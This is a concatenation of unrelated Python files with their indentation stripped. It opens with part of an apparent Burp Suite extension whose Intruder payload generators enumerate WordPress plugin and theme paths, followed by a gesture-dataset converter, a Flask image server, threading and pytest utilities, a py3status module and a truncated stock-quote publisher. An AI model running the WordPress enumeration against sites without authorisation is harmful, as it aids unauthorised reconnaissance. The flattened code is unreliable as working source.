def getIssueType(self):
return 0
def getSeverity(self):
return self._severity
def getConfidence(self):
return self._confidence
def getIssueBackground(self):
pass
def getRemediationBackground(self):
pass
def getIssueDetail(self):
return self._detail
def getRemediationDetail(self):
pass
def getHttpMessages(self):
return self._http_messages
def getHttpService(self):
return self.getHttpMessages()[0].getHttpService()
def getRequest(self, number):
if len(self._http_messages) > number:
return self._http_messages[number].getRequest()
else:
return ""
def getResponse(self, number):
if len(self._http_messages) > number:
return self._http_messages[number].getResponse()
else:
return ""
def getHost(self):
host = "{}://{}".format(self.getHttpService().getProtocol(), self.getHttpService().getHost())
port = self.getHttpService().getPort()
if port not in [80, 443]:
host += ":{}".format(port)
return host
def getPath(self):
url = str(self.getUrl())
spliced = url.split("/")
return "/" + "/".join(spliced[3:])
class IssuesDetailsTable(JTable):
def __init__(self, extender, model):
self._extender = extender
self.setModel(model)
def changeSelection(self, row, col, toggle, extend):
model_row = self.convertRowIndexToModel(row)
self.current_issue = self._extender.list_issues.get(model_row)
issue_details = self.current_issue.getIssueDetail()
self._extender.panel_bottom_advisory.setText(issue_details)
self._extender.panel_bottom_request1.setMessage(self.current_issue.getRequest(0), True)
self._extender.panel_bottom_response1.setMessage(self.current_issue.getResponse(0), False)
request2 = self.current_issue.getRequest(1)
if request2 != "":
self._extender.panel_bottom.setEnabledAt(3, True)
self._extender.panel_bottom.setEnabledAt(4, True)
self._extender.panel_bottom_request2.setMessage(request2, True)
self._extender.panel_bottom_response2.setMessage(self.current_issue.getResponse(1), False)
else:
self._extender.panel_bottom.setEnabledAt(3, False)
self._extender.panel_bottom.setEnabledAt(4, False)
JTable.changeSelection(self, row, col, toggle, extend)
class IssuesTableModel(AbstractTableModel):
def __init__(self, extender):
self._extender = extender
def getRowCount(self):
try:
return self._extender.list_issues.size()
except:
return 0
def getColumnCount(self):
return 5
def getColumnName(self, column_index):
if column_index == 0:
return "Issue type"
elif column_index == 1:
return "Host"
elif column_index == 2:
return "Path"
elif column_index == 3:
return "Severity"
elif column_index == 4:
return "Confidence"
def getValueAt(self, row_index, column_index):
advisory_entry = self._extender.list_issues.get(row_index)
if column_index == 0:
return advisory_entry.getIssueName()
elif column_index == 1:
return advisory_entry.getHost()
elif column_index == 2:
return advisory_entry.getPath()
elif column_index == 3:
return advisory_entry.getSeverity()
elif column_index == 4:
return advisory_entry.getConfidence()
class IntruderPluginsGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Plugins"
def createNewInstance(self, attack):
return IntruderPayloadGenerator(self.generator, "plugins")
class IntruderThemesGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Themes"
def createNewInstance(self, attack):
return IntruderPayloadGenerator(self.generator, "themes")
class IntruderPluginsThemesGenerator(IIntruderPayloadGeneratorFactory):
def __init__(self, generator):
self.generator = generator
def getGeneratorName(self):
return "WordPress Plugins and Themes"
def createNewInstance(self, attack):
return IntruderPayloadGeneratorMixed(self.generator)
class IntruderPayloadGenerator(IIntruderPayloadGenerator):
def __init__(self, extender, _type):
self.payload_index = 0
self.extender = extender
self.type = _type
self.iterator = self.extender.database[self.type].iteritems()
self.iterator_length = len(self.extender.database[self.type])
self.extender.print_debug("[+] Start intruder for {}, has {} payloads".format(self.type, self.iterator_length))
def hasMorePayloads(self):
return self.payload_index < self.iterator_length
def getNextPayload(self, base_value):
if self.payload_index <= self.iterator_length:
try:
k, v = self.iterator.next()
self.payload_index += 1
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), self.type, k)
except StopIteration:
pass
def reset(self):
self.payload_index = 0
class IntruderPayloadGeneratorMixed(IIntruderPayloadGenerator):
def __init__(self, extender):
self.payload_index = 0
self.extender = extender
self.iterator = chain(self.extender.database["themes"].iteritems(),
self.extender.database["plugins"].iteritems())
self.iterator_themes_length = len(self.extender.database["themes"])
self.iterator_length = (self.iterator_themes_length + len(self.extender.database["plugins"]))
self.extender.print_debug("[+] Start mixed intruder, has {} payloads".format(self.iterator_length))
def hasMorePayloads(self):
return self.payload_index < self.iterator_length
def getNextPayload(self, base_value):
if self.payload_index < self.iterator_length:
try:
k, v = self.iterator.next()
self.payload_index += 1
if self.payload_index <= self.iterator_themes_length:
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), "themes", k)
else:
return "{}/{}/{}/".format(self.extender.config.get('wp_content', 'wp-content'), "plugins", k)
except StopIteration:
pass
def reset(self):
self.payload_index = 0
|
msrc12_skels_to_h5.py
|
from __future__ import absolute_import, division, print_function
import os
import numpy as np
import h5py as h5
import re
import csv
from glob import glob
from tqdm import trange
import shutil
import time
from multiprocessing import Process, Queue, current_process, freeze_support
def worker(input, output):
prog = re.compile(r'MicrosoftGestureDataset-RC/data/P(\d)_(\d)_(\d*).*_p(\d*).tagstream', re.IGNORECASE)
for found_file in iter(input.get, 'STOP'):
confpars = prog.findall(found_file)[0]
instruction = (int(confpars[0]), int(confpars[1]))
action = int(confpars[2])
subject = int(confpars[3])
with open(found_file) as csvfile:
tags_reader = csv.reader(csvfile, delimiter=';')
tags = []
for r, row in enumerate(tags_reader):
if r == 0:
assert(row[0] == 'XQPCTick')
else:
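# Map the XQPCTick timestamp to a frame index; 49875 appears to be the
# tick-to-frame scale and the +(49875/2) term rounds to the nearest frame.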
tag = (int(row[0])*1000 + (49875/2))/49875
tags.append(tag)
frame_count = 0
pose_arrays = []
data_file = found_file[:-10]+'.csv'
with open(data_file) as csvfile:
skelreader = csv.reader(csvfile, delimiter=' ')
for tag in tags:
current_frame = 0
skels = []
while current_frame < tag:
row = next(skelreader)
current_frame = int(row[0])
skel = np.reshape(np.array(row[1:], dtype=np.float32), [20, 4, 1])
skels.append(skel)
pose_arrays.append(np.concatenate(skels,axis=2))
frame_count = max(frame_count, len(skels))
output.put((subject, action, pose_arrays, frame_count))
if __name__ == '__main__':
found_dirs = [file for file in glob('MicrosoftGestureDataset-RC/data/*.tagstream')]
print('Processing %d files...' % (len(found_dirs)))
data_set = 'MSRC12'
h5file = h5.File(data_set+"v1.h5", "w")
subjects = set()
actions = set()
max_frame_count = 0
num_procs = 4
# Create queues
task_queue = Queue()
done_queue = Queue()
# Submit tasks
for found_dir in found_dirs:
task_queue.put(found_dir)
# Start worker processes
print('Spawning processes...')
for _ in range(num_procs):
Process(target=worker, args=(task_queue, done_queue)).start()
# Get and print results
print('Processed Files:')
t = trange(len(found_dirs), dynamic_ncols=True)
seq_num = 0
for _ in t:
subject, action, pose_arrays, frame_count = done_queue.get()
subjects.add(subject)
actions.add(action)
sub_array = np.array(subject)
act_array = np.array(action)
max_frame_count = max(frame_count, max_frame_count)
# v1 split (cross subject protocol)
data_split = 'Train' if (subject % 2) == 1 else 'Validate'
for pose_array in pose_arrays:
data_path = '{}/{}/SEQ{}/'.format(data_set, data_split, seq_num)
h5file.create_dataset(
data_path + 'Subject', np.shape(sub_array),
dtype='int32', data=sub_array
)
h5file.create_dataset(
data_path + 'Action', np.shape(act_array),
dtype='int32', data=act_array
)
h5file.create_dataset(
data_path + 'Pose', np.shape(pose_array),
dtype='float32', data=pose_array
)
seq_num += 1
# Tell child processes to stop
print('Stopping processes...')
for _ in range(num_procs):
task_queue.put('STOP')
h5file.flush()
h5file.close()
print("")
print("done.")
print("Subjects: ", subjects)
print("Actions: ", actions)
print("Max Frame Count:", max_frame_count)
|
image_server.py
|
import logging
import time
from threading import Lock
from threading import Thread
import requests
from flask import Flask
from flask import redirect
from flask import request
from werkzeug.wrappers import Response
import arc852.cli_args as cli
from arc852.constants import CAMERA_NAME_DEFAULT
from arc852.constants import HTTP_HOST_DEFAULT, HTTP_DELAY_SECS_DEFAULT, HTTP_PORT_DEFAULT
from arc852.opencv_utils import encode_image
logger = logging.getLogger(__name__)
_image_endpoint_url = "/image.jpg"
class ImageServer(object):
args = [cli.template_file, cli.http_port, cli.http_delay_secs, cli.http_verbose]
def __init__(self,
template_file,
camera_name=CAMERA_NAME_DEFAULT,
http_host=HTTP_HOST_DEFAULT,
http_delay_secs=HTTP_DELAY_SECS_DEFAULT,
http_verbose=False,
log_info=logger.info,
log_debug=logger.debug,
log_error=logger.error):
self.__template_file = template_file
self.__camera_name = camera_name
self.__http_host = http_host
self.__http_delay_secs = http_delay_secs
self.__log_info = log_info
self.__log_debug = log_debug
self.__log_error = log_error
vals = self.__http_host.split(":")
self.__host = vals[0]
self.__port = vals[1] if len(vals) == 2 else HTTP_PORT_DEFAULT
self.__current_image_lock = Lock()
self.__current_image = None
self.__ready_to_stop = False
self.__flask_launched = False
self.__ready_to_serve = False
self.__started = False
self.__stopped = False
if not http_verbose:
class FlaskFilter(logging.Filter):
def __init__(self, fname):
super(FlaskFilter, self).__init__()
self.__fname = "GET {0}".format(fname)
def filter(self, record):
return self.__fname not in record.msg
logging.getLogger('werkzeug').addFilter(FlaskFilter(_image_endpoint_url))
@property
def image(self):
with self.__current_image_lock:
if self.__current_image is None:
return []
return self.__current_image
@image.setter
def image(self, image):
# Wait until potential sleep in start() has completed
if not self.__ready_to_serve:
return
if not self.__started:
self.__log_error("ImageServer.start() not called")
return
if not self.__flask_launched:
height, width = image.shape[:2]
self.__launch_flask(width, height)
with self.__current_image_lock:
# Encode to bytes if passed in as an nparray
if isinstance(image, bytes):
self.__current_image = image
else:
retval, buf = encode_image(image)
self.__current_image = buf.tobytes()
def __launch_flask(self, width, height):
flask = Flask(__name__)
@flask.route('/')
def index():
return redirect("/image?delay={0}".format(self.__http_delay_secs))
@flask.route('/image')
def image_option():
return get_page(request.args.get("delay"))
@flask.route("/image" + "/<string:delay>")
def image_path(delay):
return get_page(delay)
@flask.route(_image_endpoint_url)
def image_jpg():
response = Response(self.image, mimetype="image/jpeg")
response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'
response.headers['Pragma'] = 'no-cache'
return response
@flask.route("/__shutdown__", methods=['POST'])
def shutdown():
if not self.__ready_to_stop:
return "Not ready to stop"
shutdown_func = request.environ.get('werkzeug.server.shutdown')
if shutdown_func:
self.__stopped = True
shutdown_func()
return "Shutting down..."
def get_page(delay):
delay_secs = float(delay) if delay else self.__http_delay_secs
try:
with open(self.__template_file) as f:
html = f.read()
name = self.__camera_name
return html.replace("_TITLE_", name + " Camera") \
.replace("_DELAY_SECS_", str(delay_secs)) \
.replace("_NAME_", name) \
.replace("_WIDTH_", str(width)) \
.replace("_HEIGHT_", str(height)) \
.replace("_IMAGE_FNAME_", _image_endpoint_url)
except BaseException as e:
self.__log_error("Unable to create template file with %s [%s]", self.__template_file, e, exc_info=True)
time.sleep(1)
def run_http(flask_server, host, port):
while not self.__stopped:
try:
self.__log_info("Starting server with {0}:{1}".format(host, port))
flask_server.run(host=host, port=int(port))
except BaseException as e:
self.__log_error("Restarting HTTP server [%s]", e, exc_info=True)
time.sleep(1)
finally:
self.__log_info("HTTP server shutdown")
# Run HTTP server in a thread
Thread(target=run_http, kwargs={"flask_server": flask, "host": self.__host, "port": self.__port}).start()
self.__flask_launched = True
self.__log_info("Running HTTP server on http://%s:%s/", self.__host, self.__port)
def start(self):
if self.__started:
self.__log_error("ImageServer.start() already called")
return
if self.__flask_launched:
return
# Cannot start the flask server until the dimensions of the image are known
# So do not fire up the thread until the first image is available
self.__log_info("Starting ImageServer")
self.__log_info("Using template file %s", self.__template_file)
self.__log_info("Starting HTTP server on http://%s:%s/", self.__host, self.__port)
self.__ready_to_serve = True
self.__started = True
def stop(self):
if not self.__flask_launched:
return
self.__ready_to_stop = True
url = "http://{0}:{1}".format(self.__host, self.__port)
self.__log_info("Shutting down %s", url)
try:
requests.post("{0}/__shutdown__".format(url))
except requests.exceptions.ConnectionError:
self.__log_error("Unable to stop ImageServer")
|
worker.py
|
from dataclasses import dataclass, field
import threading
import time
import typing as tp
import stopit
from pypeln import utils as pypeln_utils
from . import utils
from .queue import IterableQueue, OutputQueues
WorkerConstructor = tp.Callable[[int, "StageParams", IterableQueue], "Worker"]
Kwargs = tp.Dict[str, tp.Any]
T = tp.TypeVar("T")
class ProcessFn(pypeln_utils.Protocol):
def __call__(self, worker: "Worker", **kwargs):
...
class StageParams(tp.NamedTuple):
input_queue: IterableQueue
output_queues: OutputQueues
lock: threading.Lock
namespace: utils.Namespace
@classmethod
def create(
cls, input_queue: IterableQueue, output_queues: OutputQueues, total_workers: int
) -> "StageParams":
return cls(
lock=threading.Lock(),
namespace=utils.Namespace(active_workers=total_workers),
input_queue=input_queue,
output_queues=output_queues,
)
def worker_done(self):
with self.lock:
self.namespace.active_workers -= 1
class WorkerInfo(tp.NamedTuple):
index: int
@dataclass
class Worker(tp.Generic[T]):
process_fn: ProcessFn
index: int
timeout: float
stage_params: StageParams
main_queue: IterableQueue
on_start: tp.Optional[tp.Callable[..., Kwargs]]
on_done: tp.Optional[tp.Callable[..., Kwargs]]
f_args: tp.List[str]
namespace: utils.Namespace = field(
default_factory=lambda: utils.Namespace(done=False, task_start_time=None)
)
process: tp.Optional[threading.Thread] = None
def __call__(self):
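# Worker lifecycle: build optional kwargs via on_start, run process_fn over the
# input queue, mark this worker as done for the stage, then call on_done and
# signal the output queues that no more items will be produced.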
worker_info = WorkerInfo(index=self.index)
on_start_args: tp.List[str] = (
pypeln_utils.function_args(self.on_start) if self.on_start else []
)
on_done_args: tp.List[str] = (
pypeln_utils.function_args(self.on_done) if self.on_done else []
)
try:
if self.on_start is not None:
on_start_kwargs = dict(worker_info=worker_info)
kwargs = self.on_start(
**{
key: value
for key, value in on_start_kwargs.items()
if key in on_start_args
}
)
else:
kwargs = {}
if kwargs is None:
kwargs = {}
kwargs.setdefault("worker_info", worker_info)
self.process_fn(
self,
**{key: value for key, value in kwargs.items() if key in self.f_args},
)
self.stage_params.worker_done()
if self.on_done is not None:
kwargs.setdefault(
"stage_status",
StageStatus(
namespace=self.stage_params.namespace,
lock=self.stage_params.lock,
),
)
self.on_done(
**{
key: value
for key, value in kwargs.items()
if key in on_done_args
}
)
except pypeln_utils.StopThreadException:
pass
except BaseException as e:
try:
self.main_queue.raise_exception(e)
time.sleep(0.001)
except pypeln_utils.StopThreadException:
pass
finally:
self.namespace.done = True
self.stage_params.output_queues.done()
def start(self):
[self.process] = start_workers(self)
def stop(self):
if self.process is None:
return
self.namespace.task_start_time = None
if not self.process.is_alive():
return
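# Interrupt the worker thread by injecting StopThreadException into it
# (stopit.async_raise raises the exception asynchronously via the thread's ident).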
stopit.async_raise(
self.process.ident,
pypeln_utils.StopThreadException,
)
def done(self):
self.namespace.done = True
def did_timeout(self):
return (
self.timeout
and not self.namespace.done
and self.namespace.task_start_time is not None
and (time.time() - self.namespace.task_start_time > self.timeout)
)
@dataclass
class MeasureTaskTime:
worker: "Worker"
def __enter__(self):
self.worker.namespace.task_start_time = time.time()
def __exit__(self, *args):
self.worker.namespace.task_start_time = None
def measure_task_time(self):
return self.MeasureTaskTime(self)
class Applicable(pypeln_utils.Protocol):
def apply(self, worker: "Worker", elem: tp.Any, **kwargs):
...
class ApplyProcess(ProcessFn, Applicable):
def __call__(self, worker: Worker, **kwargs):
for elem in worker.stage_params.input_queue:
with worker.measure_task_time():
self.apply(worker, elem, **kwargs)
class StageStatus:
"""
Object passed to various `on_done` callbacks. It contains information about the stage in case bookkeeping is needed.
"""
def __init__(self, namespace, lock):
self._namespace = namespace
self._lock = lock
@property
def done(self) -> bool:
"""
`bool` : `True` if all workers finished.
"""
with self._lock:
return self._namespace.active_workers == 0
@property
def active_workers(self):
"""
`int` : Number of active workers.
"""
with self._lock:
return self._namespace.active_workers
def __str__(self):
return (
f"StageStatus(done = {self.done}, active_workers = {self.active_workers})"
)
# ----------------------------------------------------------------
# start_workers
# ----------------------------------------------------------------
def start_workers(
target: tp.Callable,
n_workers: int = 1,
args: tp.Tuple[tp.Any, ...] = tuple(),
kwargs: tp.Optional[tp.Dict[tp.Any, tp.Any]] = None,
use_threads: bool = True,
) -> tp.List[threading.Thread]:
if kwargs is None:
kwargs = {}
workers = []
for _ in range(n_workers):
t = threading.Thread(target=target, args=args, kwargs=kwargs)
t.daemon = True
t.start()
workers.append(t)
return workers
|
async_script.py
|
# -*- coding: utf-8 -*-
"""
Display output of a given script, updating the display when new lines
come in.
Always displays the last line of output from a given script, set by
`script_path`. If a line contains only a color (/^#[0-9a-fA-F]{6}$/), it is
used as such (set force_nocolor to disable).
The script may have parameters.
Configuration parameters:
force_nocolor: if true, won't check if a line contains color
(default False)
format: see placeholders below (default '{output}')
script_path: script you want to show output of (compulsory)
(default None)
strip_output: shall we strip leading and trailing spaces from output
(default False)
Format placeholders:
{output} output of script given by "script_path"
i3status.conf example:
```
external_script {
format = "{output}"
script_path = "ping 127.0.0.1"
}
```
@author frimdo ztracenastopa@centrum.cz, girst
SAMPLE OUTPUT
{'full_text': 'script output'}
example
{'full_text': '[193957.380605] wlp3s0: authenticated'}
"""
import re
import shlex
from subprocess import Popen, PIPE
from threading import Thread
class Py3status:
"""
"""
# available configuration parameters
force_nocolor = False
format = "{output}"
script_path = None
strip_output = False
def post_config_hook(self):
# class variables:
self.command_thread = Thread()
self.command_output = None
self.command_color = None
self.command_error = None # cannot throw self.py3.error from thread
if not self.script_path:
self.py3.error("script_path is mandatory")
def async_script(self):
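# Called by py3status on each refresh: restart the reader thread if it died,
# then return the most recently cached line (and color) from the script.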
response = {}
response["cached_until"] = self.py3.CACHE_FOREVER
if self.command_error is not None:
self.py3.log(self.command_error, level=self.py3.LOG_ERROR)
self.py3.error(self.command_error, timeout=self.py3.CACHE_FOREVER)
if not self.command_thread.is_alive():
self.command_thread = Thread(target=self._command_start)
self.command_thread.daemon = True
self.command_thread.start()
if self.command_color is not None:
response["color"] = self.command_color
response["full_text"] = self.py3.safe_format(
self.format, {"output": self.command_output}
)
return response
def _command_start(self):
try:
command = Popen(shlex.split(self.script_path), stdout=PIPE)
while True:
if command.poll() is not None: # script has exited/died; restart it
command = Popen(shlex.split(self.script_path), stdout=PIPE)
output = command.stdout.readline().decode().strip()
if re.search(r"^#[0-9a-fA-F]{6}$", output) and not self.force_nocolor:
self.command_color = output
else:
if output != self.command_output:
self.command_output = output
self.py3.update()
except Exception as e:
self.command_error = str(e)
self.py3.update()
if __name__ == "__main__":
"""
Run module in test mode.
"""
from py3status.module_test import module_test
module_test(Py3status, config={"script_path": "ping 127.0.0.1"})
|
mproc.py
|
import os
import time
import multiprocessing
import concurrent.futures
import py
from _pytest.junitxml import LogXML
from _pytest.terminal import TerminalReporter
from _pytest.junitxml import Junit
from _pytest.junitxml import _NodeReporter
from _pytest.junitxml import bin_xml_escape
from _pytest.junitxml import mangle_test_address
from .base import BaseMode
class MultiProcessMode(BaseMode):
NAME = 'mproc'
# Manager for the shared variables used in multiprocess mode
MANAGER = multiprocessing.Manager()
# to override the variable self.stats from LogXML
XMLSTATS = MANAGER.dict()
XMLSTATS['error'] = 0
XMLSTATS['passed'] = 0
XMLSTATS['failure'] = 0
XMLSTATS['skipped'] = 0
# ensures that XMLSTATS is not being modified simultaneously
XMLLOCK = multiprocessing.Lock()
XMLREPORTER = MANAGER.dict()
# XMLREPORTER_ORDERED = MANAGER.list()
NODELOCK = multiprocessing.Lock()
NODEREPORTS = MANAGER.list()
# to keep track of the log for TerminalReporter
DICTIONARY = MANAGER.dict()
# to override the variable self.stats from TerminalReporter
STATS = MANAGER.dict()
# ensures that STATS is not being modified simultaneously
LOCK = multiprocessing.Lock()
''' Multiprocess is not compatible with Windows !!! '''
def run_items(self, items, session, workers=None):
'''Use a ThreadPoolExecutor to control the lifecycle of the worker processes.
Each thread spawns a process and terminates when that process joins.
'''
def run_task_in_proc(item, index):
proc = multiprocessing.Process(target=self._run_next_item, args=(session, item, index))
proc.start()
proc.join()
with concurrent.futures.ThreadPoolExecutor(max_workers=workers) as executor:
for index, item in enumerate(items):
executor.submit(run_task_in_proc, item, index)
def set_reporter(self, config):
standard_reporter = config.pluginmanager.getplugin('terminalreporter')
concurrent_reporter = ConcurrentTerminalReporter(standard_reporter)
config.pluginmanager.unregister(standard_reporter)
config.pluginmanager.register(concurrent_reporter, 'terminalreporter')
if config.option.xmlpath is not None:
xmlpath = config.option.xmlpath
config.pluginmanager.unregister(config._xml)
config._xml = ConcurrentLogXML(xmlpath, config.option.junitprefix, config.getini("junit_suite_name"))
config.pluginmanager.register(config._xml)
class ConcurrentNodeReporter(_NodeReporter):
'''to provide Node Reporting for multiprocess mode'''
def __init__(self, nodeid, xml):
self.id = nodeid
self.xml = xml
self.add_stats = self.xml.add_stats
self.duration = 0
self.properties = []
self.nodes = []
self.testcase = None
self.attrs = {}
def to_xml(self): # overridden
testcase = Junit.testcase(time=self.duration, **self.attrs)
testcase.append(self.make_properties_node())
for node in self.nodes:
testcase.append(node)
return str(testcase.unicode(indent=0))
def record_testreport(self, testreport):
assert not self.testcase
names = mangle_test_address(testreport.nodeid)
classnames = names[:-1]
if self.xml.prefix:
classnames.insert(0, self.xml.prefix)
attrs = {
"classname": ".".join(classnames),
"name": bin_xml_escape(names[-1]),
"file": testreport.location[0],
}
if testreport.location[1] is not None:
attrs["line"] = testreport.location[1]
if hasattr(testreport, "url"):
attrs["url"] = testreport.url
self.attrs = attrs
def finalize(self):
data = self.to_xml() # .unicode(indent=0)
self.__dict__.clear()
self.to_xml = lambda: py.xml.raw(data)
MultiProcessMode.NODEREPORTS.append(data)
class ConcurrentLogXML(LogXML):
'''to provide XML reporting for multiprocess mode'''
def __init__(self, logfile, prefix, suite_name="pytest"):
logfile = os.path.expanduser(os.path.expandvars(logfile))
self.logfile = os.path.normpath(os.path.abspath(logfile))
self.prefix = prefix
self.suite_name = suite_name
self.stats = MultiProcessMode.XMLSTATS
self.node_reporters = {} # XMLREPORTER # nodeid -> _NodeReporter
self.node_reporters_ordered = []
self.global_properties = []
# List of reports that failed on call but teardown is pending.
self.open_reports = []
self.cnt_double_fail_tests = 0
def pytest_sessionfinish(self):
dirname = os.path.dirname(os.path.abspath(self.logfile))
if not os.path.isdir(dirname):
os.makedirs(dirname)
logfile = open(self.logfile, 'w', encoding='utf-8')
suite_stop_time = time.time()
suite_time_delta = suite_stop_time - self.suite_start_time
numtests = (self.stats['passed'] + self.stats['failure'] + self.stats['skipped'] + self.stats['error'] - self.cnt_double_fail_tests)
# print("NODE REPORTS: " + str(NODEREPORTS))
logfile.write('<?xml version="1.0" encoding="utf-8"?>')
logfile.write(Junit.testsuite(
self._get_global_properties_node(),
[self.concurrent_log_to_xml(x) for x in MultiProcessMode.NODEREPORTS],
name=self.suite_name,
errors=self.stats['error'],
failures=self.stats['failure'],
skips=self.stats['skipped'],
tests=numtests,
time="%.3f" % suite_time_delta, ).unicode(indent=0))
logfile.close()
def add_stats(self, key):
MultiProcessMode.XMLLOCK.acquire()
if key in self.stats:
self.stats[key] += 1
MultiProcessMode.XMLLOCK.release()
def node_reporter(self, report):
nodeid = getattr(report, 'nodeid', report)
# local hack to handle xdist report order
slavenode = getattr(report, 'node', None)
key = nodeid, slavenode
# NODELOCK.acquire()
if key in self.node_reporters:
# TODO: breaks for --dist=each
return self.node_reporters[key]
reporter = ConcurrentNodeReporter(nodeid, self)
self.node_reporters[key] = reporter
# NODEREPORTS.append(reporter.to_xml())
return reporter
def pytest_terminal_summary(self, terminalreporter):
terminalreporter.write_sep("-",
"generated xml file: %s" % (self.logfile))
def concurrent_log_to_xml(self, log):
return py.xml.raw(log)
class ConcurrentTerminalReporter(TerminalReporter):
'''to provide terminal reporting for multiprocess mode'''
def __init__(self, reporter):
TerminalReporter.__init__(self, reporter.config)
self._tw = reporter._tw
self.stats = MultiProcessMode.STATS
def add_stats(self, key):
if key in self.stats:
self.stats[key] += 1
def pytest_runtest_logreport(self, report):
rep = report
res = self.config.hook.pytest_report_teststatus(report=rep)
cat, letter, word = res
self.append_list(self.stats, cat, rep)
if report.when == 'call':
MultiProcessMode.DICTIONARY[report.nodeid] = report
self._tests_ran = True
if not letter and not word:
# probably passed setup/teardown
return
if self.verbosity <= 0:
if not hasattr(rep, 'node') and self.showfspath:
self.write_fspath_result(rep.nodeid, letter)
else:
self._tw.write(letter)
else:
if isinstance(word, tuple):
word, markup = word
else:
if rep.passed:
markup = {'green': True}
elif rep.failed:
markup = {'red': True}
elif rep.skipped:
markup = {'yellow': True}
line = self._locationline(rep.nodeid, *rep.location)
if not hasattr(rep, 'node'):
self.write_ensure_prefix(line, word, **markup)
# self._tw.write(word, **markup)
else:
self.ensure_newline()
if hasattr(rep, 'node'):
self._tw.write("[%s] " % rep.node.gateway.id)
self._tw.write(word, **markup)
self._tw.write(" " + line)
self.currentfspath = -2
def append_list(self, stats, cat, rep):
MultiProcessMode.LOCK.acquire()
cat_string = str(cat)
if stats.get(cat_string) is None:
stats[cat_string] = MultiProcessMode.MANAGER.list()
mylist = stats.get(cat_string)
mylist.append(rep)
stats[cat] = mylist
MultiProcessMode.LOCK.release()
|
nasdaq.py
|
#!/usr/bin/python
# $Id: nasdaq.py,v 1.2 2003/04/29 06:44:17 ifindkarma Exp $
import KNCONFIG
import sys
import time, random, urllib
from mx import DateTime
# Include local libraries:
sys.path = [ "../" ] + sys.path
from libkn import kn
from pprint import pprint
from threading import Thread
NASDAQ_MAXRQUESTS=10
NASDAQ_URL='http://quotes.nasdaq.com/quote.dll?page=custom&mode=stock'
NASDAQ_MINSWEEPTIME=5
NASDAQ_MINSWEEPTIME_NODELTA=300
KN_NASDAQ_TOPIC='/what/nasdaq2'
#expireString='+%d'%(NASDAQ_MINSWEEPTIME*5)
expireString='infinity'
quoteElements=['symbol','fullname','date','time','bid','ask','prev_close','high',
'low','last','unknown1','unknown2','change','volume']
numericQuoteElements=[4,5,7,8,9,9,9,9,9,12,13] #repeat the ones you want simulated most often
tickers={}
transmittedData={}
currentData={}
#didTransmit=0
gotDataException=0
sentSimulatedData=0
totalTransmitted=0
tickersByTens_last=None
tickersByTens=['']
tickersCount=0
gettingData=0
alwaysSimulate=1
knr=kn(host=KNCONFIG.PUBSUBSERVER_HOSTNAME,port=KNCONFIG.PUBSUBSERVER_PORT,traceOnly=KNCONFIG.PUBSUBSERVER_TRACEONLY)
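# knr is the PubSub client: it publishes quote events and subscribes to the
# kn_subtopics topic to learn about newly requested tickers.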
#==========================================================================================
# Gets called for each new kn_subtopics event for the nasdaq topic
#==========================================================================================
def newTickerCallback(ev):
"""for each new ticker add it to the dictionary, but also
add it in groups of NASDAQ_MAXRQUESTS to tickersByTens"""
global tickers,tickersByTens_last,tickersByTens,tickersCount
global gettingData
ticker=ev.kn_payload.lower()
if ticker[:3]=='kn_':
return
if(ev.kn_payload!=ticker):
knr.subscribe(kn_from=KN_NASDAQ_TOPIC+'/'+ticker,
kn_to=KN_NASDAQ_TOPIC+'/'+ev.kn_payload)
if tickers.has_key(ticker):
return
tickers[ticker]=None
if (tickersCount%NASDAQ_MAXRQUESTS)==0:
if tickersCount and not gettingData:
getTickerData(tickersByTens_last)
tickersByTens_last=''
tickersByTens_last+= ('&symbol='+ticker)
tickersCount+=1
tickersByTens[len(tickersByTens)-1]=tickersByTens_last
print 'Registered ticker: '+ticker
# if (tickersCount%10)==1:
# tickersByTens.append(tickersByTens_last)
#==========================================================================================
# Gets 10 tickers at a time
#==========================================================================================
def getAllTickerData():
global gettingData
gettingData=1
if not tickersCount:
return
for groupOfTen in tickersByTens:
getTickerData(groupOfTen)
gettingData=0
#print 'finished getAllTickerData'
def getTickerData(groupOfTen,num=10):
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData
if num>10:
raise ValueError('getTickerData supports at most 10 symbols per request')
st=urllib.urlopen(NASDAQ_URL+groupOfTen)
for i in range(num):
s=st.readline()
if not s:break
#s should be in the form
#IBM|INTERNATIONAL BUSINESS MA|08/29/2001|16:00:00|0|0||104.95|105.90|103.82|104.13|16:00:00|-0.82|4840300||
dat=s.split('|')
if len(dat)<14:
break
dat=[s.split('*')[0] for s in dat]
ev=[(quoteElements[i],
dat[i])
for i in range(min(len(dat),14))]
ev.append(('kn_payload',dat[9]))
ev.append(('kn_to',KN_NASDAQ_TOPIC+'/'+dat[0].lower()))
ev.append(('kn_expires',expireString))
ev.append(('kn_id','0'))
currentData[dat[0]]=ev
st.close()
#==========================================================================================
# Sends events for any changed values
#==========================================================================================
def sendAllChangedTickerData():
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData,transmittedData,totalTransmitted
#global didTransmit
if not tickersCount:
return
dat=[]
for ticker,current in currentData.items():
#if transmittedData.has_key(ticker):
# if transmittedData[ticker]==current:
# continue
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
current[17]=('kn_id','%s_%d'%(ticker,time.time()))
dat.append(current)
transmittedData[ticker]=current
#didTransmit=1
totalTransmitted+=1
if len(dat)>0:
knr.publish(d=dat)
print 'finished sendAllChangedTickerData (totalTransmitted=%d)'%(totalTransmitted)
def sendSimulatedData():
global tickers,tickersByTens_last,tickersByTens,tickersCount
global currentData,transmittedData,totalTransmitted
#global didTransmit
keys=tickers.keys()
dat=[]
for ticker in keys:
if len(dat)>KNCONFIG.PUBSUBSERVER_MAXBATCHSIZE:
knr.publish(d=dat)
dat=[]
if random.randrange(50)>25:
try:
current=currentData[ticker]
except:
current=[('symbol',ticker),
('fullname','FULLNAME'),
('date','1/1/2001'),
('time','10:00:00'),
('bid','40'),
('ask','40'),
('prev_close','39'),
('high','41'),
('low','39'),
('last','40'),
('unknown1',''),
('unknown2',''),
('change','1'),
('volume','10000'),
('kn_payload','40'),
('kn_to',KN_NASDAQ_TOPIC+'/'+ticker.lower()),
('kn_expires',expireString),
('kn_id','0')]
currentData[ticker]=current
